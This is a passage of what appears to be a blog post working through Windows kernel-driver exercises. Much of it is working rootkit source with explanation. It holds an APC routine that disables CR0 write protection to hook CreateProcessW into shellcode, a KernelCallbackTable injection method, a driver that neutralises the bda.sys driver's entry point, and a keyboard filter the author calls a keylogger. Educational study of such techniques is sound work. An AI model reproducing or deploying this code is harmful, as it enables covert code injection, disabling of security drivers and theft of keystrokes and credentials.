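   bytes must be saved so that only whole instructions are overwritten by a
   patch of patch_len bytes. */
size_t bytes_to_preserve(const size_t *insn_len, size_t count, size_t patch_len)
{
    size_t total = 0;
    assert(insn_len != NULL);
    for (size_t i = 0; i < count && total < patch_len; i++) {
        total += insn_len[i];
    }
    return total;
}
```

For the two instructions discussed above, with lengths 4 and 8, bytes_to_preserve with a patch length of 5 returns 12, i.e. the 0x0C offset at which the original API is resumed. The range check matters on 64-bit systems, where the stub and the patched function may be more than 2GB apart.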

Finally, here is the code of the KernelRoutine:
 VOID KernelRoutine(struct _KAPC *Apc,   
      PKNORMAL_ROUTINE *NormalRoutine,   
      PVOID *NormalContext,   
      PVOID *SystemArgument1,   // address of usermode code  
      PVOID *SystemArgument2 )  // pEPROCESS  
 {  
      NTSTATUS status_code;  
      UNICODE_STRING apiName;  
      unsigned __int64 peb, p_ldr, p_LDR_DATA_TABLE_ENTRY, pShellcode;  
      unsigned __int64 image_base, image_data_directory, export_table, AddressOfNames, AddressOfFunctions;
      unsigned __int32 AddressOfNameOrdinals;  
      unsigned __int64 cr0;  
      int count = 0;  
      KIRQL apc_irql, old_irql;  
   
      // find CreateProcessW and patch it:  
   
      // find the peb from eprocess  
      peb = ((unsigned __int64 *)SystemArgument2)[0];  
      peb = ((unsigned __int64*)( ((UCHAR *)peb) + 0x338 ))[0];  
   
      // find LDR in the peb  
      p_ldr = peb + 0x18;  
      p_ldr = *((unsigned __int64 *)p_ldr);  
   
      // find kernel32 in one of the LDR  
      p_LDR_DATA_TABLE_ENTRY = *((unsigned __int64 *)(p_ldr + 0x10));  
      while(wcscmp((wchar_t *)(*(unsigned __int64 *)(p_LDR_DATA_TABLE_ENTRY + 0x60)), L"kernel32.dll") != 0)  
      {  
           p_LDR_DATA_TABLE_ENTRY = *(unsigned __int64 *)p_LDR_DATA_TABLE_ENTRY;    
      }  
      // get kernel32 imagebase  
      image_base = *(unsigned __int64 *)(p_LDR_DATA_TABLE_ENTRY + 0x30);   
   
      // parse export table to find CreateProcessW and get the address  
      // image_base + offset PE_HEADER + offset _IMAGE_NT_HEADERS64._IMAGE_OPTIONAL_HEADER + offset _IMAGE_OPTIONAL_HEADER.DataDirectory[0]  
      image_data_directory = image_base + *(unsigned __int32*)(image_base +0x3c) + 0x18 + 0x70;  
      export_table = *((unsigned __int32 *)image_data_directory) + image_base;  
      AddressOfNames = *((unsigned __int32 *)(export_table + 0x20)) + image_base;  
        
      while(strncmp((char *)(*(unsigned __int32*)AddressOfNames) + image_base, "CreateProcessW", sizeof("CreateProcessW")) != 0)  
      {  
           AddressOfNames += 4;  
           count++;  
      }  
   
      AddressOfNameOrdinals = ((unsigned __int16 *)(*((unsigned __int32 *)(export_table + 0x24)) + image_base))[count];  
      AddressOfFunctions = ((unsigned __int32 *)(*((unsigned __int32 *)(export_table + 0x1c)) + image_base))[AddressOfNameOrdinals] + image_base;  
   
      // (copy the first API instructions in the stub, already done)  
   
      // patch the stub of the shellcode to make the last jmp point to the third instruction of CreateProcessW (api + 0x0C)  
      pShellcode = *(unsigned __int64 *)SystemArgument1;  
      *((unsigned __int32 *)&((char *)pShellcode)[sizeof(buffer)-4]) = (unsigned __int32)(AddressOfFunctions - (unsigned __int64)pShellcode - sizeof(buffer) + 0x0C);  
   
      // patch the opcode that compares the current PID with the PID of the target process  
      *((unsigned __int32 *)&((char *)pShellcode)[sizeof(buffer)-0x45]) = (unsigned __int32)PsGetProcessId(*((PEPROCESS*)SystemArgument2));  
   
      _disable();  
      cr0 = __readcr0();  
      __writecr0(cr0 & 0xfffeffff);  
   
      // patch the API address to jmp to the stub, this patch will be visible to all processes  
      // since removing the Write-Protect flag also disables the Copy-On-Write  
      ((char *)AddressOfFunctions)[0] = 0xe9;  
      *(unsigned __int32 *)(AddressOfFunctions + 1) = 0 - ((unsigned __int32)(AddressOfFunctions - (unsigned __int64)pShellcode - sizeof(buffer) + 0x56));  
   
      __writecr0(cr0);  
      _enable();  
   
      ExFreePool(Apc);  
 }  

As anticipated earlier, this routine hooks the CreateProcessW API by overwriting its first opcodes with a JMP to the shellcode (specifically, to its offset marked with the "entry" comment) and by patching some of its opcodes with parameters that are available only at run-time. In particular, these parameters are: the address of the third instruction of CreateProcessW and the PID of the target process.
There is still one interesting detail that we haven't discussed yet. In order to perform the hook, the KernelRoutine clears the WriteProtect flag (bit 16) of the CR0 register, which allows the code to write on any present memory page, even if it is marked as read only. However, this also has the side effect of disabling the copy-on-write, and we will see how this is going to be addressed.
Normally, a physical memory page of code from a system DLL is shared among all processes' virtual memory. If a process decides to patch such code (e.g. an API), the OS would detect the write attempt and would allocate a dedicated physical memory page to the patching process so that it would remain localized and would not affect the other processes. However, if the WriteProtect is disabled, the OS will not react to the write attempt and thus will not allocate a dedicated physical page for the patch. This means that the patch is effectively operating on all the running processes, but not all of them have a shellcode to jump to. Therefore, to prevent crashing them, the shellcode needs to verify that the current Pid is indeed the one of Explorer.
Note: in cases in which the kernel routine needs to modify sensitive areas of memory, some extra care is generally required. For example, it may be necessary to: disable the interrupts (possibly on all the CPUs by scheduling a DPC); use atomic operations; use proper synchronization. In my case, the driver was tested on a machine with a single CPU, therefore once the interrupts are disabled with _disable(), it is pretty safe to disable the WriteProtect and patch the code without atomic operations or synchronization.
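As a side note, the 0xfffeffff mask used in the routine is just "all bits except bit 16". The following sketch shows the same arithmetic on plain integers, without touching any register; the function names are hypothetical and the CR0 value in the usage note is only an illustrative example.

```c
#include <assert.h>
#include <stdint.h>

#define CR0_WP_BIT 16  /* position of the Write Protect flag in CR0 */

/* Return the given CR0 value with the WP flag cleared (pure arithmetic). */
uint64_t cr0_clear_wp(uint64_t cr0)
{
    return cr0 & ~(UINT64_C(1) << CR0_WP_BIT);
}

/* Return 1 if the WP flag is set in the given CR0 value, 0 otherwise. */
int cr0_wp_is_set(uint64_t cr0)
{
    return (int)((cr0 >> CR0_WP_BIT) & 1);
}

/* Sanity check: the 32-bit form of the mask is the literal used above. */
void cr0_mask_self_check(void)
{
    assert((uint32_t)~(UINT32_C(1) << CR0_WP_BIT) == UINT32_C(0xfffeffff));
}
```

For example, cr0_clear_wp(0x80050033) yields 0x80040033. The literal 0xfffeffff is a 32-bit value, so ANDing it with a 64-bit variable also clears bits 32 to 63; this makes no difference here because those bits of CR0 are reserved and must be zero.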

Method 3
I tried to work on a third method, which proved to be unstable and therefore cannot be used. However, I think it deserves some attention. This method tries to harness the kernelmode API KeUserModeCallback in order to run code in usermode.
The OS maintains a table of usermode callback routines, which is located in usermode and is pointed to by PEB.KernelCallbackTable. In particular, these callbacks can be called from kernelmode with the API KeUserModeCallback, which takes as input the index of the desired function within the table. Thus, by inserting a pointer to the shellcode inside this table, I can manage to call it from kernelmode and have it executed in usermode.

The code requires some changes. A first difference is at the end of the shellcode:
 ...  
 0xC0, 0x48, 0x81, 0xC4, 0x68, 0x01, 0x00, 0x00, 0xcd, 0x2b, 0xc3  
which ends with an "int 2b" (0xcd 0x2b) and a "ret" (0xC3). We will see later why.

Another modification occurs in the DriverEntry, when the KAPC structure is initialized:

PKeInitializeApc(pApc, ethreads, OriginalApcEnvironment, &KernelRoutine, NULL, (PKNORMAL_ROUTINE)(baseaddr + 0x35A), UserMode, NULL);
if(!PKeInsertQueueApc(pApc, baseaddr, p_proc, 0))  

The code again uses a dummy normal routine: the "baseaddr + 0x35A" parameter points to the last byte of the shellcode (the RET). If a normal routine is not provided, the system seems to crash.

Finally, the KernelRoutine is the one that changes significantly and does the actual job of overwriting an entry in the KernelCallbackTable:
 VOID KernelRoutine(struct _KAPC *Apc,   
      PKNORMAL_ROUTINE *NormalRoutine,   
      PVOID *NormalContext,   
      PVOID *SystemArgument1,   // address of usermode code  
      PVOID *SystemArgument2 )  // pEPROCESS  
 {  
      NTSTATUS status_code;  
      UNICODE_STRING apiName;  
      NTSTATUS (*pKeUserModeCallback)(ULONG apiNumber, void* inputBuffer, ULONG inputLength, void** outputBuffer, ULONG* outputLength);  
      unsigned __int64 peb, callback_table;  
      unsigned __int64 cr0;  
      KIRQL apc_irql, old_irql;    
   
      DbgPrint("APC kernel routine\n");  
   
      RtlInitUnicodeString(&apiName, L"KeUserModeCallback");  
      pKeUserModeCallback = MmGetSystemRoutineAddress(&apiName);   
   
      if(pKeUserModeCallback == NULL)  
      {  
           DbgPrint("Cannot find pKeUserModeCallback\n");  
           return;  
      }  
   
      DbgPrint("Usermode address: %016x \n", SystemArgument1);  
   
      // retrieve PEB address     
      peb = ((unsigned __int64 *)SystemArgument2)[0];  
      peb = ((unsigned __int64*)( ((UCHAR *)peb) + 0x338 ))[0];  
   
      // retrieve kernel callback table     
      callback_table = ((unsigned __int64*)(((UCHAR *)peb) + 0x58))[0] ;  
   
      // insert shellcode address into an empty function slot (slot n 0x76, 0x76*8 = 3b0)     
      callback_table += 0x3b0;   
   
      _disable();  
      cr0 = __readcr0();  
      __writecr0(cr0 & 0xfffeffff);  
   
      ((unsigned __int64*)callback_table)[0] = (unsigned __int64)((unsigned __int64 *)SystemArgument1)[0];  
   
      __writecr0(cr0);  
      _enable();  
   
      // call it, but first...  be careful:       
      // usermode callbacks can only run at PASSIVE, or else bugcheck IRQL_GT_ZERO_AT_SYSTEM_SERVICE  
      apc_irql = KeGetCurrentIrql();  
      KeLowerIrql(PASSIVE_LEVEL);  
    
      status_code = pKeUserModeCallback(0x76, 0, 0, 0, 0);  
   
      KeRaiseIrql(apc_irql, &old_irql);

      // ** from user mode to terminate do  xor ecx, ecx / xor edx, edx / int 2b (see shellcode) **
   
      ExFreePool(Apc);  
 }  

I chose to overwrite the table entry at index 0x76 because on my system it was always zero, but it would be preferable to have a more generic approach to find an empty entry. Once the table entry is written with the pointer to the shellcode, the driver lowers the IRQL to PASSIVE_LEVEL (it will be restored later) and issues a call to KeUserModeCallback with 0x76 as index. The routine gets executed (Notepad starts successfully) and when the usermode code has finished its task, it returns to the kernel by issuing an int 2b. Unfortunately, when the routine ends, the process crashes. I made some tests and experiments, trying to figure out whether it was a problem related to the stack, but I always ended up with a crash (a usermode one, not a BSOD). In the end, I did not investigate this issue further, but I believe that it should be possible to make this method stable and reliable.

4)
To protect a shared memory resource (allocated in nonpaged memory) in an SMP environment I would use a spinlock: the routines that access the resource must acquire the spinlock before reading or writing the data.
Before acquiring a spinlock, the system raises the IRQL to DISPATCH_LEVEL so that other threads cannot preempt the current one on that CPU, then it attempts to obtain ownership of the spinlock by continuously checking its availability in a loop (that is, spinning). This mechanism ensures that only one thread on one CPU at a time accesses the shared data, and it is quite efficient as long as the lock is not held for a long time.
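To make the spinning part concrete, here is a minimal usermode sketch based on C11 atomics. It is only an analogy under my own assumptions: the guarded_counter type and its functions are hypothetical names, and there is no IRQL in usermode, so the "raise to DISPATCH_LEVEL" step is not modelled. In a driver one would rely on the kernel's own primitives (KeInitializeSpinLock, KeAcquireSpinLock, KeReleaseSpinLock) instead of writing the loop by hand.

```c
#include <assert.h>
#include <stdatomic.h>
#include <stdbool.h>
#include <stddef.h>

/* A shared value together with the lock that protects it. */
typedef struct {
    atomic_flag locked;   /* clear = free, set = held */
    long shared_counter;  /* the data protected by the lock */
} guarded_counter;

void guarded_init(guarded_counter *g)
{
    assert(g != NULL);
    atomic_flag_clear(&g->locked);
    g->shared_counter = 0;
}

/* Try once to take the lock; returns true if it was free and is now ours. */
bool spin_try_acquire(guarded_counter *g)
{
    assert(g != NULL);
    return !atomic_flag_test_and_set_explicit(&g->locked, memory_order_acquire);
}

/* Spin until the lock becomes available. */
void spin_acquire(guarded_counter *g)
{
    while (!spin_try_acquire(g)) {
        /* busy wait: keep checking until the owner releases the lock */
    }
}

void spin_release(guarded_counter *g)
{
    assert(g != NULL);
    atomic_flag_clear_explicit(&g->locked, memory_order_release);
}

/* Every access to the shared data is bracketed by acquire/release. */
void guarded_add(guarded_counter *g, long delta)
{
    spin_acquire(g);
    g->shared_counter += delta;
    spin_release(g);
}
```

The critical section in guarded_add is deliberately tiny: since waiters burn CPU time while spinning, a spinlock only pays off when the lock is held very briefly.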

5)
 #include <Ntifs.h>  
 #include <string.h>  
   
 #define WORD  UINT16  
 #define DWORD UINT32  
 #define BYTE  UINT8  
   
 typedef struct _IMAGE_DOS_HEADER  
 {  
      WORD e_magic;  
      WORD e_cblp;  
      WORD e_cp;  
      WORD e_crlc;  
      WORD e_cparhdr;  
      WORD e_minalloc;  
      WORD e_maxalloc;  
      WORD e_ss;  
      WORD e_sp;  
      WORD e_csum;  
      WORD e_ip;  
      WORD e_cs;  
      WORD e_lfarlc;  
      WORD e_ovno;  
      WORD e_res[4];  
      WORD e_oemid;  
      WORD e_oeminfo;  
      WORD e_res2[10];  
      LONG e_lfanew;  
 } IMAGE_DOS_HEADER, *PIMAGE_DOS_HEADER;  
   
 typedef struct _IMAGE_FILE_HEADER {  
      WORD Machine;  
      WORD NumberOfSections;  
      DWORD TimeDateStamp;  
      DWORD PointerToSymbolTable;  
      DWORD NumberOfSymbols;  
      WORD SizeOfOptionalHeader;  
      WORD Characteristics;  
 } IMAGE_FILE_HEADER, *PIMAGE_FILE_HEADER;  
            
 typedef struct _IMAGE_DATA_DIRECTORY {  
      DWORD VirtualAddress;  
      DWORD Size;  
 } IMAGE_DATA_DIRECTORY, *PIMAGE_DATA_DIRECTORY;  
            
 #define IMAGE_NUMBEROF_DIRECTORY_ENTRIES 16  
            
  typedef struct _IMAGE_OPTIONAL_HEADER64 {  
      WORD Magic; /* 0x20b */  
      BYTE MajorLinkerVersion;  
      BYTE MinorLinkerVersion;  
      DWORD SizeOfCode;  
      DWORD SizeOfInitializedData;  
      DWORD SizeOfUninitializedData;  
      DWORD AddressOfEntryPoint;  
      DWORD BaseOfCode;  
      ULONGLONG ImageBase;  
      DWORD SectionAlignment;  
      DWORD FileAlignment;  
      WORD MajorOperatingSystemVersion;  
      WORD MinorOperatingSystemVersion;  
      WORD MajorImageVersion;  
      WORD MinorImageVersion;  
      WORD MajorSubsystemVersion;  
      WORD MinorSubsystemVersion;  
      DWORD Win32VersionValue;  
      DWORD SizeOfImage;  
      DWORD SizeOfHeaders;  
      DWORD CheckSum;  
      WORD Subsystem;  
      WORD DllCharacteristics;  
      ULONGLONG SizeOfStackReserve;  
      ULONGLONG SizeOfStackCommit;  
      ULONGLONG SizeOfHeapReserve;  
      ULONGLONG SizeOfHeapCommit;  
      DWORD LoaderFlags;  
      DWORD NumberOfRvaAndSizes;  
      IMAGE_DATA_DIRECTORY DataDirectory[IMAGE_NUMBEROF_DIRECTORY_ENTRIES];  
 } IMAGE_OPTIONAL_HEADER64, *PIMAGE_OPTIONAL_HEADER64;  
   
 typedef struct _IMAGE_NT_HEADERS64 {  
      DWORD Signature;  
      IMAGE_FILE_HEADER FileHeader;  
      IMAGE_OPTIONAL_HEADER64 OptionalHeader;  
 } IMAGE_NT_HEADERS64, *PIMAGE_NT_HEADERS64;  
   
 DRIVER_INITIALIZE DriverEntry;  
   
 #ifdef ALLOC_PRAGMA  
 #pragma alloc_text( INIT, DriverEntry )  
 #endif  
   
 VOID  
   (load_img)(  
      PUNICODE_STRING FullImageName,  
      HANDLE ProcessId,  
      PIMAGE_INFO ImageInfo  
   )  
 {  
      WCHAR *drivername;  
      UNICODE_STRING servicename;  
      NTSTATUS unload;  
      PIMAGE_DOS_HEADER MZ;  
      PIMAGE_NT_HEADERS64 PE;  
      UINT8 * entry_point;  
      unsigned __int64 cr0;  
      UCHAR patch[] = {0xb8, 0x01, 0x00, 0x00, 0xc0, 0xc3};  // unsigned: 0xb8, 0xc0 and 0xc3 do not fit in a signed char  
   
      if(!(ImageInfo->SystemModeImage))  
      {  
           // ignore usermode images  
           return;  
      }  
   
      if(FullImageName->Length >= 8*sizeof(WCHAR))  
      {  
           drivername = FullImageName->Buffer + (FullImageName->Length/sizeof(WCHAR)) - 8;  
           if(wcsncmp(drivername, L"\\bda.sys", 8) == 0)  
           {  
                 DbgPrint("bda.sys driver detected! imagebase %p \n", (UINT8*)ImageInfo->ImageBase);  
   
                MZ = (IMAGE_DOS_HEADER *) ImageInfo->ImageBase;  
                PE = (PIMAGE_NT_HEADERS64) ( ((UINT8*)ImageInfo->ImageBase) + MZ->e_lfanew);  
                entry_point = PE->OptionalHeader.AddressOfEntryPoint + (UINT8*)ImageInfo->ImageBase;  
   
                _disable();  
                cr0 = __readcr0();  
                 __writecr0(cr0 & ~0x10000ULL);  // clear CR0.WP (bit 16) to allow writes to read-only pages  
   
                //patch:  
                // b8 01 00 00 c0   mov  eax, 0xc0000001  
                // c3         ret  
                memcpy(entry_point , &patch, sizeof(patch));  
     
                __writecr0(cr0);  
                _enable();  
   
           }  
      }  
 }  
   
 VOID MyUnload(__in PDRIVER_OBJECT DriverObject)  
 {  
      PsRemoveLoadImageNotifyRoutine(&load_img);  
 }  
   
 NTSTATUS  
 DriverEntry(PDRIVER_OBJECT  DriverObject, PUNICODE_STRING RegistryPath)  
 {  
      DriverObject->DriverUnload = &MyUnload;   
   
      PsSetLoadImageNotifyRoutine(&load_img);  
   
      return STATUS_SUCCESS;  
 }  

The driver installs a load image notify routine via PsSetLoadImageNotifyRoutine. This routine checks whether the name of the loaded image is bda.sys, and if it is, it patches its entry point with assembly instructions equivalent to:
 return STATUS_UNSUCCESSFUL;  

The load image notify routine is called after the driver is mapped in memory, but before its entry point is executed. Thus, patching the entry point with the above code will cause the driver to report a failure in loading and the OS will unload bda.sys from memory without executing any other code from it.
Finally, when the driver is unloaded, the callback to the load image notify routine is removed via PsRemoveLoadImageNotifyRoutine.
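
The entry point lookup and the patch can also be tried out in usermode on a plain byte buffer. The following sketch assumes a little-endian host and an image laid out as it is in memory (so the RVA is also an offset into the buffer); the demo_* names and the bounds checks are my own additions and are not part of the driver above.

```c
#include <stdint.h>
#include <string.h>

/* Offsets taken from the PE header structures declared in the driver. */
#define DEMO_E_LFANEW_OFFSET  0x3c  /* IMAGE_DOS_HEADER.e_lfanew */
#define DEMO_ENTRY_RVA_OFFSET 0x28  /* Signature (4) + IMAGE_FILE_HEADER (20) + 16 bytes into the optional header */

/* mov eax, 0xC0000001 (STATUS_UNSUCCESSFUL) ; ret */
static const uint8_t demo_patch[] = { 0xb8, 0x01, 0x00, 0x00, 0xc0, 0xc3 };

/* Returns AddressOfEntryPoint, or 0 if the headers look malformed. */
static uint32_t demo_entry_point_rva(const uint8_t *image, size_t size)
{
    uint32_t lfanew, rva;

    if (size < DEMO_E_LFANEW_OFFSET + 4 || image[0] != 'M' || image[1] != 'Z')
        return 0;
    memcpy(&lfanew, image + DEMO_E_LFANEW_OFFSET, sizeof(lfanew));
    if (lfanew > size || size - lfanew < DEMO_ENTRY_RVA_OFFSET + 4)
        return 0;
    if (memcmp(image + lfanew, "PE\0\0", 4) != 0)
        return 0;
    memcpy(&rva, image + lfanew + DEMO_ENTRY_RVA_OFFSET, sizeof(rva));
    return rva;
}

/* Overwrites the entry point with the patch; returns 1 on success, 0 otherwise. */
static int demo_patch_entry_point(uint8_t *image, size_t size)
{
    uint32_t rva = demo_entry_point_rva(image, size);

    if (rva == 0 || rva > size || size - rva < sizeof(demo_patch))
        return 0;
    memcpy(image + rva, demo_patch, sizeof(demo_patch));
    return 1;
}

/* Decodes the 32-bit immediate of the "mov eax, imm32" instruction in the patch. */
static uint32_t demo_patch_status(void)
{
    return (uint32_t)demo_patch[1]
         | (uint32_t)demo_patch[2] << 8
         | (uint32_t)demo_patch[3] << 16
         | (uint32_t)demo_patch[4] << 24;
}
```

Unlike this sketch, the driver writes to pages that are mapped read-only, which is why it has to clear the WP bit in CR0 around the memcpy.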

6)
sioctl.h:
 #include <ntddkbd.h>  
   
 typedef struct _DEVICE_EXTENSION   
 {   
   PDEVICE_OBJECT pTargetDevice;   
 } DEVICE_EXTENSION, *PDEVICE_EXTENSION;   

sioctl.c:
 #include <ntddk.h>  
 #include <string.h>  
 #include "sioctl.h"  
   
 #define WORD  UINT16  
 #define DWORD UINT32  
 #define BYTE  UINT8  
   
 DRIVER_INITIALIZE DriverEntry;  
   
 #ifdef ALLOC_PRAGMA  
 #pragma alloc_text( INIT, DriverEntry )  
 #endif  
   
 PDEVICE_OBJECT kbd_class_dev = NULL;  
 PDEVICE_OBJECT my_keyboard_dev = NULL;  
   
 // scan codes taken from http://www.win.tue.nl/~aeb/linux/kbd/scancodes-10.html (column Set 1)  
 #define SCAN_MAPPINGS 0x3b  
 const char* scan_code_mapping[SCAN_MAPPINGS] = {  
 "<unk>", "<unk>", "1 or !", "2 or @", "3 or #", "4 or $", "5 or %", "6 or ^", "7 or &", "8 or *", "9 or (", "0 or )",  
 "- or _", "= or +", "Backspace", "Tab", "Q", "W", "E", "R", "T", "Y", "U", "I", "O", "P", "[ or {", "] or }", "Enter", "LCtrl",  
 "A", "S", "D", "F", "G", "H", "J", "K", "L", "; or :", "' or \"", "` or ~", "LShift", "\\ or |",   
 "Z","X", "C", "V", "B", "N", "M", ", or <", ". or >", "/ or ?", "RShift", "<unk>", "LAlt", "space", "CapsLock"  
 };  
   
 VOID MyUnload(__in PDRIVER_OBJECT DriverObject)  
 {  
      DbgPrint("Unload routine\n");  
      IoDetachDevice(kbd_class_dev);  
      IoDeleteDevice(my_keyboard_dev);  
 }  
   
 NTSTATUS io_completion(PDEVICE_OBJECT DeviceObject, PIRP Irp, PVOID Context)  
 {  
      KEYBOARD_INPUT_DATA *key_buffer;  
      unsigned long key_number = 0, i;  
        
      // read data from the IRP, put it in key  
      if(Irp->IoStatus.Status == STATUS_SUCCESS)  
      {  
           // system buffer may contain an array of KEYBOARD_INPUT_DATA  
           // The size (in bytes) of the SystemBuffer is stored in Irp->IoStatus.Information  
           key_buffer = (PKEYBOARD_INPUT_DATA)Irp->AssociatedIrp.SystemBuffer;  
           if(Irp->IoStatus.Information != 0)  
           {  
                key_number = (unsigned long)(Irp->IoStatus.Information) / sizeof(KEYBOARD_INPUT_DATA);  
           }  
   
           for(i = 0; i < key_number; i++)  
           {  
                // only log char in a key release event, not key press  
                 if(key_buffer[i].Flags & KEY_BREAK)  // test the bit: KEY_E0/KEY_E1 may be set as well  
                {  
                     if(key_buffer[i].MakeCode < SCAN_MAPPINGS)  
                     {  
                          // translate and log the scan code  
                          DbgPrint("Key scancode: %s \n", scan_code_mapping[ key_buffer[i].MakeCode ]);  
                     }  
                     else  
                     {  
                          DbgPrint("<unk>\n");  
                     }  
                }  
           }  
      }  
        
      if(Irp->PendingReturned) IoMarkIrpPending(Irp);  
      return Irp->IoStatus.Status;  
 }   
   
 NTSTATUS kbd_mj_read(PDEVICE_OBJECT DeviceObject, PIRP Irp)  
 {  
      IoCopyCurrentIrpStackLocationToNext(Irp);  
      IoSetCompletionRoutine(Irp, io_completion, NULL, TRUE, TRUE, TRUE);  
      return IoCallDriver(((PDEVICE_EXTENSION)DeviceObject->DeviceExtension)->pTargetDevice, Irp);   
 }  
   
 NTSTATUS DriverEntry(DRIVER_OBJECT *DriverObject, PUNICODE_STRING RegistryPath)  
 {  
      NTSTATUS status_code;  
      UNICODE_STRING kbd_class_name;  
      PFILE_OBJECT kbd_class_file = NULL;  
      PDEVICE_EXTENSION device_ext;  
      int i;  
   
      DriverObject->DriverUnload = &MyUnload;  
      DriverObject->MajorFunction[IRP_MJ_READ] = &kbd_mj_read;  
   
      // create a new device  
      status_code = IoCreateDevice(DriverObject, sizeof(DEVICE_EXTENSION), NULL, FILE_DEVICE_KEYBOARD, 0, FALSE, &my_keyboard_dev);  
      if(status_code != STATUS_SUCCESS)  
      {  
           DbgPrint("Error creating device \n");  
           return STATUS_UNSUCCESSFUL;  
      }  
   
      // retrieve the keyboard class device   
      RtlInitUnicodeString(&kbd_class_name, L"\\Device\\KeyboardClass0");  
      status_code = IoGetDeviceObjectPointer(&kbd_class_name, FILE_READ_ATTRIBUTES, &kbd_class_file, &kbd_class_dev);  
      if(status_code != STATUS_SUCCESS)  
      {  
           DbgPrint("Error getting keyboard class object \n");  
           IoDeleteDevice(my_keyboard_dev);  
           return STATUS_UNSUCCESSFUL;  
      }  
   
      // set the device extension for the new device and attach it to class device     
      RtlZeroMemory(my_keyboard_dev->DeviceExtension, sizeof(DEVICE_EXTENSION));  
      device_ext = (PDEVICE_EXTENSION)my_keyboard_dev->DeviceExtension;  
      device_ext->pTargetDevice = IoAttachDeviceToDeviceStack(my_keyboard_dev, kbd_class_dev);  
   
      // the file object reference taken by IoGetDeviceObjectPointer is no longer needed  
      ObDereferenceObject(kbd_class_file);  
   
      if(device_ext->pTargetDevice == NULL)  
      {  
           DbgPrint("Error attaching to keyboard device \n");  
           IoDeleteDevice(my_keyboard_dev);  
           return STATUS_UNSUCCESSFUL;  
      }  
   
      // important! Set the correct flags for the new device, especially DO_BUFFERED_IO, or else  
      // the new device won't have any flag set, and IRP.AssociatedIrp.SystemBuffer will be zero  
      // causing the system to copy the scancode data to a NULL buffer, which will bsod  
      my_keyboard_dev->Flags = kbd_class_dev->Flags;  
   
      return STATUS_SUCCESS;  
 }  
   

The driver implements a basic keylogger. It attaches its own device object to the keyboard device stack and filters the IRPs going to it. In particular, the device object is created via IoCreateDevice, passing FILE_DEVICE_KEYBOARD as the DeviceType, and it is attached to the keyboard device stack via IoAttachDeviceToDeviceStack; the device object returned by that call is saved in the DeviceExtension. The keyboard device is obtained via IoGetDeviceObjectPointer, by specifying \Device\KeyboardClass0 as the ObjectName. The flags of the keyboard device are copied to the newly created device object, as explained in the source code.
Moreover, the MajorFunction[IRP_MJ_READ] entry (in the driver object) is set to a simple pass-through function that receives an IRP, copies the current stack location to the next one (via IoCopyCurrentIrpStackLocationToNext), sets a completion routine (via IoSetCompletionRoutine) and passes the IRP down to the keyboard device (via IoCallDriver). The completion routine processes the IRP after the keyboard driver has filled it with the information about the received keystrokes. The driver simply inspects each KEYBOARD_INPUT_DATA structure in the output buffer (stored in IRP.AssociatedIrp.SystemBuffer) and retrieves the keystroke scan codes.
I used standard scan codes to perform a very basic mapping of the keystrokes to the corresponding characters; in general, such a translation is considerably more complicated than this implementation.
When the driver is unloaded, the device is first detached from the keyboard device stack (via IoDetachDevice) and then deleted (via IoDeleteDevice).
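
To give an idea of why the translation gets more complicated, here is a small usermode sketch of the same logic that also looks at the E0 prefix flag: with it, a scan code that normally means LCtrl or LAlt identifies the right-hand key instead. The flag values are the ones from ntddkbd.h; demo_key_event is a hypothetical, reduced stand-in for KEYBOARD_INPUT_DATA, and the table covers only a handful of Set 1 codes.

```c
#include <stddef.h>

/* Flag values as defined in ntddkbd.h. */
#define DEMO_KEY_MAKE  0x00
#define DEMO_KEY_BREAK 0x01
#define DEMO_KEY_E0    0x02

/* Hypothetical, reduced stand-in for KEYBOARD_INPUT_DATA. */
typedef struct {
    unsigned short MakeCode;
    unsigned short Flags;
} demo_key_event;

/* Returns the key name for a key release, or NULL for a key press. */
static const char *demo_translate(const demo_key_event *ev)
{
    /* Test the bit instead of comparing: E0/E1 may be set together with BREAK. */
    if (!(ev->Flags & DEMO_KEY_BREAK))
        return NULL;

    if (ev->Flags & DEMO_KEY_E0) {
        switch (ev->MakeCode) {
        case 0x1c: return "Keypad Enter";
        case 0x1d: return "RCtrl";
        case 0x38: return "RAlt";
        default:   return "<unk>";
        }
    }

    switch (ev->MakeCode) {
    case 0x1c: return "Enter";
    case 0x1d: return "LCtrl";
    case 0x1e: return "A";
    case 0x38: return "LAlt";
    case 0x39: return "space";
    default:   return "<unk>";
    }
}

/* Walks a buffer of `bytes` bytes, as the completion routine does with
   IoStatus.Information, and counts the key release events in it. */
static size_t demo_count_releases(const demo_key_event *buf, size_t bytes)
{
    size_t i, count = 0, n = bytes / sizeof(demo_key_event);

    for (i = 0; i < n; i++) {
        if (demo_translate(&buf[i]) != NULL)
            count++;
    }
    return count;
}
```

Keyboard layouts, modifier state and dead keys are still ignored here, so this remains far from a complete translation.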

7)
The first implementation I wrote is the following:
 #include <ntifs.h>  
 #include <string.h>   
   
 #define WORD  UINT16  
 #define DWORD UINT32  
 #define BYTE  UINT8  
   
 VOID MyUnload(PDRIVER_OBJECT DriverObject)  
 {  
      DbgPrint("Unload routine\n");  
 }  
   
 // return value: 0 = success, nonzero = error  
 int change_protection(BYTE *virtual_address, ULONG length, PMDL *Mdl, PVOID *address)  
 {  
      *Mdl = IoAllocateMdl(virtual_address, length, 0, 0, NULL);  
      if(*Mdl == NULL)  
      {  
           return 1;  
      }  
   
      MmProbeAndLockPages(*Mdl, KernelMode, IoReadAccess);  
        
      *address = MmMapLockedPagesSpecifyCache(*Mdl, KernelMode, MmNonCached, (PVOID)virtual_address, FALSE, NormalPagePriority);  
      if(*address == NULL)  
      {  
           return 2;  
      }  
        
      DbgPrint("Mapped address: %p \n", *address);  
   
      if(MmProtectMdlSystemAddress(*Mdl, PAGE_EXECUTE_READWRITE) != STATUS_SUCCESS)  
      {  
           return 3;  
      }  
   
      return 0;  
 }  
   
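 void unmap_mdl(PMDL *Mdl, PVOID *Address)  
 {  
      MmUnmapLockedPages(*Address, *Mdl);  
      // pages locked with MmProbeAndLockPages must be unlocked before the MDL is freed  
      MmUnlockPages(*Mdl);  
      IoFreeMdl(*Mdl);  
 }  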
   
 NTSTATUS DriverEntry(DRIVER_OBJECT *DriverObject, PUNICODE_STRING RegistryPath)  
 {  
      NTSTATUS status_code;  
      BYTE *nonpaged_address;  
      int code;  
      PMDL pMdl;  
      BYTE *new_address;   
   
      DriverObject->DriverUnload = MyUnload;  
   
      // taken from monitor.sys (mapped in the range fffff880`0459f000 - fffff880`045ad000)
      nonpaged_address = (BYTE *)0xfffff8800459f000;  
        
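      code = change_protection(nonpaged_address, 0x10, &pMdl, (PVOID *)&new_address);  
      DbgPrint("change protection return value: %d \n", code);  
   
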